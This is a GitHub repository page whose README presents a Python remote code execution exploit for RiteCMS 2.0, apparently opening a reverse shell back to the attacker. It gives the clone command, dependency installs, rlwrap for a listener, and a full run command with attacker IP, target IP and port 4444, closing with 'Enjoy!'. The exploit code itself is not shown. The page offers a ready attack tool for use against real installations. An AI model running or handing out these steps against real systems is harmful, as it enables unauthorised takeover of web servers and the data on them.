Skip to content

pjobsina/RiteCMS-2.0-Exploit-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
 
 
 
 
 
 

Repository files navigation

RiteCMS-2.0-Remote-Code-Execution

A Remote Code Execution python script to exploit RiteCMS 2.0

python3 ritecms2.0-exploit.py -i <IP> -t <target-IP> -p <port>

Install pip

pip3 install requests
pip3 install argparse
pip3 install subprocess

Install rlwrap

sudo apt install rlwrap

Steps to reproduce

git clone https://github.com/pjobsina/RiteCMS-2.0-Exploit-RCE.git && cd RiteCMS-2.0-Exploit-RCE
python3 ritecms2.0-exploit.py -i 192.168.1.10 -t 192.168.1.20 -p 4444

NOTE

If first run does not work, try to run again.

Screenshot

image

Enjoy!